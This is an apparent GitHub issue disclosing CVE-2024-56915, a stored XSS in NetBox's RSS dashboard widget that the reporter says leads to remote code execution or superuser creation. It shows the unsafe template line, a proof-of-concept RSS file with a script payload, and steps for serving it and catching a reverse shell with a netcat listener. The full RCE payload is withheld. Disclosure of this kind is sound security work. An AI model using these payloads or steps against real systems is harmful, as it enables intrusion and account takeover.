XSS in RSS Feed Summary Tag can lead to RCE or SuperUser Creation - CVE-2024-56915 #18379
Description
Deployment Type
Self-hosted
Triage priority
I'm a NetBox Labs customer
NetBox Version
4.2.1
Python Version
3.12
Steps to Reproduce
I've sent a full list of vulnerabilities I've located to [email protected]. The report was sent late last year. I've upgaded to the latest version v4.2.1 and I've confirmed each vulnerability. A malicious RSS feed could potentially create a SuperUser or get a reverse shell via remote code execution. For that to be the case and administrator would need to have the malicious rss feed on their dashboard or have the ability to add rss widgets, create users/superusers, and/or upload scripts.
/netbox-4.2.1/netbox/templates/extras/dashboard/widgets/rssfeed.html
{% for entry in feed.entries %}
<div class="list-group-item px-1 py-2">
<a href="{{ entry.link }}" class="text-body">{{ entry.title }}</a>
<div class="text-secondary">
{{ entry.summary|safe }}
</div>
</div>- Craft an xml file with the RSS Feed Proof of Concept code.
- Start a python3 web server on attacker server in the directory hosting the xml file.
python3 -m http.server 80 - Navigate to the NetBox dashboard and add an RSS widget.
- Edit the RSS widget to point to the attacker controlled IP address and save.
- Refresh the Dashboard.
RSS Feed Proof of Concept
A general proof of concept is provided below. The SessionID cookie is being protected by httponly flag. The alternative scripts allow the attacker to perform remote code execution for shell access on the NetBox server and create a new superuser but I don't believe I should post them here.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>Sample RSS Feed</title>
<link>https://www.example.com</link>
<description>Example RSS feed with a summary</description>
<language>en-us</language>
<pubDate>Sat, 23 Nov 2024 00:00:00 GMT</pubDate>
<item>
<title> Blog Post</title>
<link>https://www.example.com/first-blog-post</link>
<guid>https://www.example.com/first-blog-post</guid>
<pubDate>Sat, 23 Nov 2024 12:00:00 GMT</pubDate>
<summary><script>alert(document.cookie)</script>This is a brief summary of the blog post.</summary>
</item>
</channel>
</rss>
Reproduce the Attack
- Copy the Proof Of Concept - RSS Remote Code Execution code to an xml file. (not posting it here)
- Edit the server_ip in the XML file to the attacker controlled IP Address.
- Start a python3 web server in the directory hosting the xml file
python3 -m http.server 80- Start a netcat listener
nc -nlvp 9006- Navigate to the netbox dashboard and add an RSS widget
- Edit the RSS widget to point to the attacker controlled IP address and save.
- Refresh the Dashboard. After a few seconds the file should be pulled from the attacker server and uploaded to the NetBox server. The shell connection should come back to the attacker controlled netcat listener
Expected Behavior
I do not expect that an external rss feed I've connected to my netbox labs source could create a superuser or get a reverse shell on my netbox server.
Observed Behavior
Remote Code Execution -> Reverse Shell
SuperUser was created